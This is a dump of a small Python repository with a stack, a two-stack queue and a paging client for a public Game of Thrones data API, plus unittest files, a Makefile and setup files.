self.logger.info(\"dict: {type0} {cnt} {keys}\"\n .format(type0=type(v0), cnt=len(v0), keys=\", \".join(v0.keys())))\n self.logger.info(\"dict: {url}\".format(url=v0['url']))\n\n\n def test_001(self):\n q0 = ['a','b','c']\n\n x = 'b'\n v0 = IceFireA.first_true(q0, default=x)\n self.logger.info(\"first_true: {0}\".format(v0))\n self.assertTrue(v0 == q0[0])\n\n fpred = lambda x: x == 'b'\n\n x = '0'\n v0 = IceFireA.first_true(q0, default=x, pred=fpred)\n self.logger.info(\"first_true: {0}\".format(v0))\n self.assertTrue(v0 == 'b')\n\n fpred = lambda x: x == 'x'\n\n v0 = IceFireA.first_true(q0, default=x, pred=fpred)\n self.logger.info(\"first_true: {0}\".format(v0))\n self.assertTrue(v0 == x)\n\n def test_002(self):\n \"\"\"\n Basic loading from file for testing.\n \"\"\"\n books = IceFireA(type0=\"books\", file=\"books.txt\")\n self.assertIsNotNone(books)\n self.ar = books\n\n def test_004(self):\n \"\"\"\n Counting\n \"\"\"\n self.test_002()\n l0 = self.ar._src\n self.logger.info(type(l0))\n l1 = list(l0)\n self.logger.info(\"004: count: {cnt}\".format(cnt=len(l1)) )\n\n 
pass\n\n def make0(self):\n ts = IceFire.types0\n ts = \", \".join(ts)\n self.logger.info(\"006: {ts}\".format(ts=ts))\n\n self.srcs = ( ( \"{x}\".format(x=x), \"{x}.txt\".format(x=x) ) for x in IceFire.types0 )\n\n self.srcs = list(self.srcs) \n self.logger.info(self.srcs)\n\n fctr = lambda x: IceFireA(type0=x[0], file=x[1])\n v0 = fctr(self.srcs[0])\n self.logger.info(type(v0))\n\n # check one\n self.srcs0 = ( fctr(x) for x in self.srcs )\n v0 = next(self.srcs0)\n self.logger.info(type(v0))\n\n # now all\n self.srcs0 = list( fctr(x) for x in self.srcs )\n\n def test_006(self):\n \"\"\"\n Other checks\n \"\"\"\n self.make0()\n srcs0 = ( list(x._src) for x in self.srcs0 )\n cnts = ( len(x) for x in srcs0 )\n\n self.logger.info(\", \".join((str(x) for x in cnts)) )\n\n def test_008(self):\n self.make0()\n v0 = list((x._type0, x) for x in self.srcs0)\n self.logger.info(type(v0[0]))\n d0 = dict(v0)\n self.logger.info(d0.keys())\n\n ## Books from API\n b0 = list(d0['books']._src)\n self.logger.info(\"c). books from API: {0}\".format(len(b0)))\n\n def test_010(self):\n d0 = IceFireA.make0()\n self.logger.info(\"factory: {0}\".format(d0.keys()))\n\n h0 = d0['houses']._src # as an iterable\n walk, walk2 = itertools.tee(h0)\n\n # check it can work\n v0 = IceFireA.first_true(walk, default='null')\n self.logger.info(v0['url'])\n\n fpred = lambda x: x['name'].find(\"Breakstone\") > -1\n v0 = IceFireA.first_true(walk2, default='null', pred=fpred)\n self.logger.info(v0['url'])\n\n self.logger.info(\"a). House Breakstone is at {0}\".format(v0['url']))\n\n ## b). How many males, females and unknown genders are there in the first\n ## 40 characters? Note, index 0 does not correspond to a character, so\n ## full range is 1 - 40 both ends inclusive.\n\n c0 = d0['characters']._src # as an iterable\n\n c1 = itertools.islice(c0, 40)\n walk, walk2 = itertools.tee(c1)\n self.logger.info(type(walk))\n self.logger.info(len(list(walk)))\n\n gndrs = list((x['gender'] for x in walk2))\n self.logger.info(\"gndrs {0} {1}\".format(len(gndrs), gndrs))\n gtypes = set(gndrs)\n self.logger.info(gtypes)\n\n ## lambda functions don't work, try partials\n def snap0(x, tag=\"\"):\n return x == tag\n\n tag0 = list(gtypes)[0]\n snap1 = partial(snap0, tag=tag0)\n v0 = snap1(gndrs[0])\n self.logger.info(\"snap1: {} {}\".format(v0, tag0))\n\n ## List of partials\n\n fpreds = ( partial(snap0, tag=x) for x in gtypes )\n fpreds = list(fpreds)\n\n cnts = list( ( sum(map(fx, gndrs)) for fx in fpreds ))\n self.logger.info(cnts)\n self.logger.info(\"b). 
first 40 gender distribution {} \".format(list(zip(gtypes, cnts))))\n\n ## d) How many books does the character ‘High Septon’ appear in?\n ## (ignoring ‘povcharacters’)\n\n d0 = IceFireA.make0()\n c0 = d0['characters']._src # as an iterable\n\n walk, walk2 = itertools.tee(c0)\n\n fpred = lambda x: x['name'].find(\"High Septon\") > -1\n ckey0 = IceFireA.first_true(walk, default={ 'url': 'null' }, pred=fpred)\n self.logger.info(ckey0['url'])\n\n ## to match the url of a character in books.characters\n tag0 = ckey0['url']\n snap1 = partial(snap0, tag=tag0)\n\n b0 = d0['books']._src # as an iterable\n walk, walk2 = itertools.tee(b0)\n\n bc = dict(((x['name'], x['characters']) for x in walk2))\n self.logger.info(len(bc.keys()))\n self.logger.info(bc.keys())\n\n x00 = list(bc.values())\n x1 = x00[0]\n self.logger.info(x1)\n \n v0 = ( IceFireA.first_true(x, default='', pred=snap1) for x in x00 )\n v0 = list(v0)\n self.logger.info(v0)\n\n ## if length is greater than 0 is the URL of ckey0\n def snap2(x):\n return int(len(x) > 0)\n\n # finally, apply snap2 and sum \n nckey0 = sum(map(snap2, v0))\n\n self.logger.info(\"d). {0} books have character High Septon {1}\"\n .format(nckey0, ckey0['url']))\n\n pass\n\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" }, { "alpha_fraction": 0.5686777830123901, "alphanum_fraction": 0.5712451934814453, "avg_line_length": 20.63888931274414, "blob_id": "6c36e3dd08b4358811229719ec9422a90eaa5e8f", "content_id": "996ba7347c1beb85d5f629015c630260182b8913", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 779, "license_type": "no_license", "max_line_length": 80, "num_lines": 36, "path": "/blkswn/_Stack.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @author weaves\n##\n## \n\nclass Stack:\n \"\"\"\n Stack implementation using native list.\n \"\"\"\n\n def __init__(self):\n self.elements = []\n\n def push(self, item):\n self.elements.append(item)\n\n def pop(self):\n \"\"\"\n Return the stored reference to top element and remove it from the stack.\n\n This does not trap exceptions. Use is_empty() prior to invoking this.\n \"\"\"\n return self.elements.pop()\n\n def peek(self):\n \"\"\"\n Return the stored reference and do not remove it.\n\n This does not trap exceptions. 
Use is_empty() prior to invoking this.\n \"\"\"\n return self.elements[-1]\n\n def size(self):\n return len(self.elements)\n\n def is_empty(self):\n return self.size() == 0\n" }, { "alpha_fraction": 0.5986519455909729, "alphanum_fraction": 0.6029411554336548, "avg_line_length": 18.650602340698242, "blob_id": "6eb178fdbae485a47061e7fa94f522684deb527c", "content_id": "d0e0c7f8cca63b2cc7b0285a3c566d96b92d54e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 67, "num_lines": 83, "path": "/Makefile", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## weaves\n# Generic test makefile for Python\n\nPKG := $(notdir $(PWD))\n\nPYTHON ?= python3\nPIP ?= pip3\nUUT ?= \nX_LOGFILE ?= test.log\nSDIR ?= tests/media\nPYTHONIOENCODING=utf-8\n\nPROG0 ?= $(HOME)/.local/bin/$(PKG)\nPROG0_FLAGS ?= $(HOME)/.local/bin/$(PKG)\n\nSRCS ?= $(wildcard $(PKG)/*.py) $(wildcard tests/*.py)\n\nexport SDIR\nexport X_LOGFILE\n\nall::\n\ttrue\n\nall-local: data/v0.json\n\ndata/v0.json: bak/blkswn.json\n\tpython -mjson.tool < $< > $@\n\n#\tsed -e 's/ false,/ False,/g' -e 's/ true,/ True,/g' < $< > $@\n\ncheck:: contrib/$(X_LOGFILE)\n\ncontrib/$(X_LOGFILE): $(X_LOGFILE)\n\ttest -d contrib || mkdir -p contrib \n\tcp $< $@\n\nifneq ($(UUT),)\n\n$(X_LOGFILE): $(SRCS)\n\t:> $@\n\t$(PYTHON) -m unittest -v tests.$(UUT)\n\ttest -d contrib || mkdir contrib\n\nelse\n\n$(X_LOGFILE): $(SRCS)\n\t:> $@\n\t$(PYTHON) -m unittest discover -v -s tests\n\nendif \n\nclean::\n\t$(RM) $(wildcard *.pyc *.log *~ nohup.out contrib/*.log)\n\ndistclean::\n\t$(RM) -rf html\n\t$(RM) $(wildcard *.json)\n\n## Install\n\n.PHONY: uninstall dist-local distinstall check-tool\n\nuninstall::\n\trm -f $(wildcard dist/*.tar.gz)\n\t-$(SHELL) -c \"cd $(HOME)/.local; $(PIP) uninstall --yes $(PKG)\"\n\ndist-local:\n\tcp $(wildcard tests/test_*.py) contrib\n\t$(PYTHON) setup.py sdist\n\ndistinstall: uninstall dist-local\n\t$(PIP) install --user $(wildcard dist/*.tar.gz)\n\ninstall: uninstall \n\t$(PIP) install --user -e .\n\nclean::\n\t-$(SHELL) -c \"find . -type d -name __pycache__ -exec rm -rf {} \\;\"\n\t-$(SHELL) -c \"find . -type f -name '*.log' -delete \"\n\t-$(SHELL) -c \"find . -type f -name '*~' -delete \"\n\t-$(SHELL) -c \"find . 
-type d -name '*egg*' -exec rm -rf {} \\; \"\n\trm -f $(wildcard dist/*)\n\trm -f ChangeLog AUTHORS\n\n" }, { "alpha_fraction": 0.5719547271728516, "alphanum_fraction": 0.5856353640556335, "avg_line_length": 25.943262100219727, "blob_id": "a58b8130ab034b84c92481a4cc3707354840a568", "content_id": "ddf0390742ba602b6abb586afcc1a9b76e28eaa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3801, "license_type": "no_license", "max_line_length": 92, "num_lines": 141, "path": "/tests/test_Test2.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test2.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test.\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport re\nfrom urllib.parse import urlparse\n\nfrom blkswn import Configuration\nfrom blkswn import IceFireR\n\nimport unittest\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\n\nclass Test2(unittest.TestCase):\n \"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. It can list the files in the\n directory.\n \"\"\"\n queue0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n Configuration.instance(file='blkswn.cfg') # singleton\n\n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n ## Constructs\n def test_000(self):\n chs = IceFireR(config = Configuration.instance().config,\n type0='books',\n logger=self.logger)\n\n ichs = iter(chs)\n\n v0 = next(chs)\n self.logger.info(\"dict: {type0} {cnt} {keys}\"\n .format(type0=type(v0), cnt=len(v0), keys=\", \".join(v0.keys())))\n self.logger.info(\"dict: {url}\".format(url=v0['url']))\n\n v0 = next(chs)\n self.logger.info(\"dict: {type0} {cnt} {keys}\"\n .format(type0=type(v0), cnt=len(v0), keys=\", \".join(v0.keys())))\n self.logger.info(\"dict: {url}\".format(url=v0['url']))\n\n\n def test_002(self):\n chs = IceFireR(config = Configuration.instance().config,\n type0='books',\n logger=self.logger)\n\n ichs = iter(chs)\n houses = [ x for x in ichs ]\n\n self.assertIsNotNone(houses)\n self.assertTrue(len(houses) > 0)\n\n with open('books.txt', 'w') as f0:\n f0.write(str(houses))\n\n def test_004(self):\n chs = IceFireR(config = Configuration.instance().config,\n type0='houses',\n logger=self.logger)\n\n ichs = iter(chs)\n houses = [ x for x in ichs ]\n\n self.assertIsNotNone(houses)\n self.assertTrue(len(houses) > 0)\n\n with open('houses.txt', 'w') as f0:\n f0.write(str(houses))\n\n def test_006(self):\n chs = IceFireR(config = Configuration.instance().config,\n type0='characters',\n logger=self.logger)\n\n ichs = iter(chs)\n houses = [ x for x in ichs ]\n\n self.assertIsNotNone(houses)\n self.assertTrue(len(houses) > 0)\n\n with open('characters.txt', 'w') as f0:\n 
f0.write(str(houses))\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" }, { "alpha_fraction": 0.7329843044281006, "alphanum_fraction": 0.7481481432914734, "avg_line_length": 20.828571319580078, "blob_id": "0992ee02033cfd5b7c7f6ff625eb0d452013ea23", "content_id": "16d36869aa6e7b5908aefc472771d93270100db4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 764, "license_type": "no_license", "max_line_length": 72, "num_lines": 35, "path": "/README.rst", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "weaves\n\nFor Fractal Labs\n\nThis is a Stack using a list; see _Stack.py\n\nAnd a Queue that uses two Stack objects. This latter structure uses\na Towers of Hanoi rebuild when there is a dequeue()\n\nIt has these extra features:\n\nI've implemented push and pop as aliases for enqueue and dequeue\npeek() returns the first element of stack_1\n\nI've forced an error on dequeue to make the test code for the Queue (see\ntest_Test1) identical to the test code for Stack, see test_Test.\n\nIn pseudo-code\n\nEnqueue:\npush passed element onto stack_1.\n\nDequeue:\nif empty(stack_1) throw index error \nwhile (!empty(stack_1))\n element = pop from stack_1\n push element onto stack_2\n\nresult = pop from stack_2\n\nwhile (!empty(stack_2))\n element = pop from stack_2\n push element into stack_1\n\nreturn result\n" }, { "alpha_fraction": 0.5566037893295288, 
"alphanum_fraction": 0.5801886916160583, "avg_line_length": 18.272727966308594, "blob_id": "4b56a181b84cf83573ebd7b02ff49cb88da6515f", "content_id": "4711212e2b3eee3b6cacaf260fbe802963a9c3ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 212, "license_type": "no_license", "max_line_length": 52, "num_lines": 11, "path": "/setup.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom setuptools import setup\n\nsetup(\n setup_requires=['pbr>=1.9', 'setuptools>=17.1'],\n install_requires=[\n 'numpy', 'pandas',\n 'cached-property' ],\n pbr=True,\n)\n" }, { "alpha_fraction": 0.5978165864944458, "alphanum_fraction": 0.6144104599952698, "avg_line_length": 23.094736099243164, "blob_id": "c64053a4b1512721914a686302136892e5c2da5f", "content_id": "afbc4eb8df4e3c20bdc96dcfd702c5822159cf3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2290, "license_type": "no_license", "max_line_length": 87, "num_lines": 95, "path": "/blkswn/_IceFireA.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @file _IceFireA.py\n# @brief Analyzer for text files from IceFireR.py\n# @author weaves\n#\n#\n\nimport logging\nimport configparser\nimport socks\nimport socket\nfrom urllib import request\n\nfrom functools import partial\nfrom itertools import *\n\nfrom blkswn import Configuration\nfrom blkswn import IceFire\n\nimport ast\n\n\nclass IceFireA(object):\n \"\"\"\n Analyzer for text files.\n\n This is a test interface. It could just take a list iterator. Like from IceFireR.\n\n The text files are generated by IceFireR.py see test_Test2.py\n \"\"\"\n\n _type0 = None # books or characters or houses\n _src = None # the iterator\n\n @classmethod\n def make0(cls, **kwargs):\n ts = IceFire.types0\n ts = \", \".join(ts)\n\n cls.srcs = ( ( \"{x}\".format(x=x), \"{x}.txt\".format(x=x) ) for x in IceFire.types0 )\n\n cls.srcs = list(cls.srcs) \n\n fctr = lambda x: IceFireA(type0=x[0], file=x[1])\n cls.srcs0 = ( fctr(x) for x in cls.srcs )\n v0 = list((x._type0, x) for x in cls.srcs0)\n return dict(v0)\n\n\n def __init__(self, **kwargs):\n \"\"\"\n Set the type0 if given as a keyword. 
Take the filename and form an iterator.\n\n \"\"\"\n if 'type0' in kwargs:\n v0 = kwargs['type0']\n if v0 not in IceFire.types0:\n t0 = ','.join(IceFire.types0)\n s0 = '\"{v0}\" not a known type \"{t0}\"'.format(t0=t0, v0=v0)\n raise ValueError(s0)\n\n self._type0 = v0\n\n if 'file' in kwargs:\n with open(kwargs['file'], 'r') as f0:\n v0 = f0.read()\n v0 = ast.literal_eval(v0)\n self._src = iter(v0)\n\n if self._src is None:\n raise ValueError(\"no data source given\")\n\n def __str__(self):\n return str(self._type0)\n\n def filter(self, **kwargs):\n pass\n\n @classmethod\n def first_true(cls, iterable, default=False, pred=None):\n \"\"\"Returns the first true value in the iterable.\n\n If no true value is found, returns *default*\n\n If *pred* is not None, returns the first item\n for which pred(item) is true.\n\n \"\"\"\n # first_true([a,b,c], x) --> a or b or c or x\n # first_true([a,b], x, f) --> a if f(a) else b if f(b) else x\n return next(filter(pred, iterable), default)\n\n @classmethod\n def take(cls, n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n\n" }, { "alpha_fraction": 0.6080567240715027, "alphanum_fraction": 0.6242715716362, "avg_line_length": 26.48322105407715, "blob_id": "dd85e2ca2ab94e6b68a8303278ba0b96dc69dff1", "content_id": "39587d9b61788d76dcadcb05571005aca51f9ae8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3947, "license_type": "no_license", "max_line_length": 98, "num_lines": 149, "path": "/blkswn/_IceFire.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @file _IceFire.py\n# @brief Iterator that pages through the server.\n# @author weaves\n#\n# @details\n# Each object is fixed to a URL base.\n#\n\nimport logging\nimport configparser\nimport socks\nimport socket\nfrom urllib import request\n\nimport ast\nimport re\n\nfrom functools import partial\n\nfrom blkswn import Fetcher\nfrom blkswn import Configuration\n\nclass IceFire(Fetcher):\n \"\"\"\n URL fetch with more features.\n\n These support an iterator interface that steps through pages and fetches pages of\n records.\n\n The record schemas are handled in another class.\n\n @note\n I've not used the pointers in the header 'next', 'prev', 'first' or 'last'\n \"\"\"\n index0 = None\n\n types0 = ( 'books', 'houses', 'characters') # these are known to work and are in order of size.\n type0 = 'houses' # the default used by the ctr.\n idx0 = \"https://www.anapioficeandfire.com/api/{type0}\"\n idx1 = None\n base0 = \"https://www.anapioficeandfire.com/api/{type0}?page={page}&pageSize={pageSize}\"\n\n cpage = None\n npage = None\n\n def mkUrl(self, page=1, pageSize=10):\n \"\"\"\n Make an enquiry URL\n \"\"\"\n return self.base0.format(type0=self.type0, page=page, pageSize=pageSize)\n\n def __init__(self, **kwargs):\n \"\"\"\n Set the type0 if given as a keyword.\n\n Set idx1 for use with index.\n\n Pass others to the parent URL fetch class.\n \"\"\"\n super().__init__(**kwargs)\n if 'type0' in kwargs:\n self.type0 = kwargs['type0']\n\n self.idx1 = self.idx0.format(type0=self.type0)\n\n def _refs0(self, l0):\n \"\"\"\n Extract valid URLs from a string\n\n Separated by comma, then by semi-colon\n \"\"\"\n l1 = l0.split(',')\n parts = []\n for x in l1:\n l2 = re.sub(r'[<>]', '', x)\n l3 = l2.strip().split(';')\n for y in l3:\n l4 = y.strip()\n self.logger.info(str(Configuration.instance().isvalid0(l4)) + \"; \" + l4)\n if Configuration.instance().isvalid0(l4):\n parts.append(l4)\n return 
parts\n\n def extract(self, **kwargs):\n \"\"\"\n Utility method to extract information.\n\n 'index' extracts URLs; 'list' returns a data payload; 'pages' gets max and min pages.\n \"\"\"\n if 'index' in kwargs:\n return self._refs0(kwargs['index'])\n\n if 'list' in kwargs:\n r1 = kwargs['list']\n return ast.literal_eval(r1.decode())\n\n if 'pages' in kwargs:\n r1 = kwargs['pages']\n c0 = Configuration.instance().qparts\n f0 = lambda x: c0(x, fconv=int)['page']\n return [ f0(x) for x in r1 ]\n\n if 'pageSize' in kwargs: # returns a set\n r1 = kwargs['pageSize']\n c0 = Configuration.instance().qparts\n f0 = lambda x: c0(x, fconv=int)['pageSize']\n return { f0(x) for x in r1 }\n\n def __iter__(self):\n return self\n\n # Python 3 compatibility\n def __next__(self):\n if self.npage is None:\n self.index()\n else:\n if self.npage > max(self.pages): # loop counting with yield is tricky\n raise StopIteration()\n\n return self._page0(page=self.npage+1, pageSize=self.pageSize)\n\n def _page0(self, page=None, pageSize=None):\n \"\"\"\n Step through the pages.\n\n @note\n I've not used the pointers in the header 'next', 'prev', 'first' or 'last'\n \"\"\"\n yield self.cpage\n self.npage = page\n url0 = self.mkUrl(page=self.npage, pageSize=self.pageSize)\n r = self.fetch(url=url0)\n self.cpage = self.extract(list=r.read())\n\n def index(self, **kwargs):\n \"\"\"\n Gets the first page and processes the Link header to get the page count and page size.\n \"\"\"\n if not 'url' in kwargs:\n kwargs['url'] = self.idx1\n r = self.fetch(**kwargs)\n hdrs = r.info()\n if not 'Link' in hdrs:\n raise ValueError('No \\'Link\\' header in response.')\n self.index0 = self.extract(index=hdrs['Link'])\n self.pages = self.extract(pages=self.index0)\n self.pageSize = max(self.extract(pageSize=self.index0))\n self.cpage = self.extract(list=r.read())\n self.npage = min(self.pages)\n\n" }, { "alpha_fraction": 0.6158885955810547, "alphanum_fraction": 0.620802640914917, "avg_line_length": 22.689319610595703, "blob_id": "c786cf822d94aa48bdfa3aa87c673b74f5269d3f", "content_id": "a95bb6441bccd84461007a501f6e42d58e3e7f6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2442, "license_type": "no_license", "max_line_length": 74, "num_lines": 103, "path": "/blkswn/_Fetcher.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @file _Fetcher.py\n# @brief URLs, headers and JSON\n# @author weaves\n#\n# @details\n# Singleton to fetch and split.\n#\n# @note\n# \n\nimport logging\nimport configparser\nimport socks\nimport socket\nfrom urllib import request\nfrom urllib.parse import urlparse\n\nimport ast\nimport re\n\nfrom functools import partial\n\nclass Fetcher(object):\n \"\"\"\n URL fetch with more features.\n \"\"\"\n _tions = None\n _hdrs = None\n _opener = None\n\n def __init__(self, **kwargs):\n self.config = kwargs.get('config', configparser.ConfigParser())\n self.logger = kwargs.get('logger', logging.getLogger('Test'))\n if 'fetcher-proxy' in self.config.sections():\n d0 = self.config['fetcher-proxy']\n if d0['type'].startswith(\"socks5\"):\n socks.set_default_proxy(socks.SOCKS5, d0['host'], int(d0['port']))\n socket.socket = socks.socksocket\n if 'hdrs' in d0:\n self._hdrs = ast.literal_eval(d0['hdrs'])\n self._opener = request.build_opener()\n self._opener.addheaders = self._hdrs\n pass\n\n def fetch(self, **kwargs):\n if self._opener is not None:\n request.install_opener(self._opener)\n return request.urlopen(kwargs['url'])\n\n def dispose(self):\n 
\"\"\"\n The media info has to be re-created for every file.\n \"\"\"\n pass\n\n\nclass _Singleton(object):\n \"\"\"\n A configuration singleton\n \"\"\"\n _impl = None\n config = None\n\n @classmethod\n def instance(cls, **kwargs):\n if cls._impl is None:\n cls._impl = _Singleton()\n cls.config = configparser.ConfigParser()\n if kwargs.get('file', None) is not None:\n cls.config.read(kwargs['file'])\n if kwargs.get('config', None) is not None:\n cls.config = config.read(kwargs['config'])\n\n return cls._impl\n\n def isvalid0(self, url):\n \"\"\"\n Utility boolean test method to check is a string is a URI.\n \"\"\"\n try:\n result = urlparse(url)\n return all([result.scheme, result.netloc, result.path])\n except:\n return False\n\n return True\n\n def qparts(self, url, **kwargs):\n \"\"\"\n Extract the query part of a URL and return it as a dictionary.\n\n The keywords allow a conversion function to be used: fconv=int\n \"\"\"\n purl = url\n if self.isvalid0(url):\n purl = urlparse(url).query\n \n qs = dict([ x.split('=') for x in purl.split('&') ])\n if 'fconv' in kwargs:\n fconv = kwargs['fconv']\n qs = dict([ (x[0], fconv(x[1])) for x in qs.items() ])\n\n return qs\n\n\n" }, { "alpha_fraction": 0.5180851221084595, "alphanum_fraction": 0.5393617153167725, "avg_line_length": 24.37837791442871, "blob_id": "f7448b9d2e8b2994506558bff5de7bb5ca1e3a0b", "content_id": "771809abb3b3c70547b2084e899286f4a92ac197", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 940, "license_type": "no_license", "max_line_length": 66, "num_lines": 37, "path": "/blkswn/_Queue.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "from blkswn import Stack\n\nclass Queue:\n\n def __init__(self):\n self.stack_1 = Stack()\n self.stack_2 = Stack()\n\n def enqueue(self, item):\n self.stack_1.push(item)\n\n def push(self, item):\n self.enqueue(item)\n\n def pop(self):\n return self.dequeue()\n\n def peek(self):\n return self.stack_1.elements[0]\n\n def size(self):\n return self.stack_1.size() + self.stack_2.size()\n\n def is_empty(self):\n return self.stack_1.is_empty() and self.stack_2.is_empty()\n\n def dequeue(self):\n if not self.stack_1.is_empty():\n while self.stack_1.size() > 0:\n self.stack_2.push(self.stack_1.pop())\n res = self.stack_2.pop()\n while self.stack_2.size() > 0:\n self.stack_1.push(self.stack_2.pop())\n return res\n else:\n ## Be consistent and throw an IndexError\n self.stack_1.pop()\n\n" }, { "alpha_fraction": 0.655414879322052, "alphanum_fraction": 0.6582278609275818, "avg_line_length": 19.171428680419922, "blob_id": "717ddf7945e51b9b14428c200bfdf98f70ac9083", "content_id": "dae3ce173ab0e678c7e2b7d27ba5332921574556", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 711, "license_type": "no_license", "max_line_length": 52, "num_lines": 35, "path": "/blkswn/_Utility.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @file _Utility.py\n# @brief Analyzer for text files from IceFireR.py\n# @author weaves\n#\n#\n\nimport logging\nimport configparser\nimport socks\nimport socket\nfrom urllib import request\n\nfrom functools import partial\nfrom itertools import *\n\nclass _Utility(object):\n \"\"\"\n A configuration singleton\n \"\"\"\n _impl = None\n\n @classmethod\n def instance(cls, **kwargs):\n if cls._impl is None:\n cls._impl = _Utility()\n\n cls.config = configparser.ConfigParser()\n if kwargs.get('file', None) is not None:\n 
cls.config.read(kwargs['file'])\n if kwargs.get('config', None) is not None:\n # read() updates the parser in place; its return value is not the parser\n cls.config.read(kwargs['config'])\n\n return cls._impl\n\n# def count0(self, s0):\n \n" }, { "alpha_fraction": 0.3541666567325592, "alphanum_fraction": 0.4375, "avg_line_length": 15, "blob_id": "4c9a254c66e0fa64d61cd02e11d165c6268e7624", "content_id": "755c6ea701b6c90836720a497e3c3c7ab5eb57b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48, "license_type": "no_license", "max_line_length": 23, "num_lines": 3, "path": "/blkswn/_version.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n__version__ = u\"0.1.0\"\n" }, { "alpha_fraction": 0.7351852059364319, "alphanum_fraction": 0.7481481432914734, "avg_line_length": 27.421052932739258, "blob_id": "eca0042d57452fd8057ddf968879e0f70a79b32a", "content_id": "637228871f89c165b430e818e1a76014e8e5f08d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 540, "license_type": "no_license", "max_line_length": 55, "num_lines": 19, "path": "/blkswn/__init__.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom blkswn._version import __version__\nfrom blkswn._Stack import Stack\nfrom blkswn._Queue import Queue\nfrom blkswn._Fetcher import Fetcher\nfrom blkswn._Fetcher import _Singleton as Configuration\nfrom blkswn._IceFire import IceFire\nfrom blkswn._IceFireR import IceFireR\nfrom blkswn._IceFireA import IceFireA\n\nfrom blkswn._Utility import _Utility as Utility\n\n__copyright__ = 'Copyright 2019 Walter Eaves'\n__license__ = 'GPLv3'\n__title__ = 'blkswn'\n\n# appease flake8: the imports are purposeful\n(__version__, Stack, Queue)\n" }, { "alpha_fraction": 0.564064085483551, "alphanum_fraction": 0.58733731508255, "avg_line_length": 24.9350643157959, "blob_id": "760bffe4d4c952cfa5a28f0bf458d89d53d2cd58", "content_id": "5c49e32a9c13f6f11973e20af49e928e302c44ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3996, "license_type": "no_license", "max_line_length": 92, "num_lines": 154, "path": "/tests/test_Test1.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test1.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test.\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport re\nfrom urllib.parse import urlparse\n\nfrom blkswn import Configuration\nfrom blkswn import IceFire\n\nimport unittest\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\n\nclass Test1(unittest.TestCase):\n 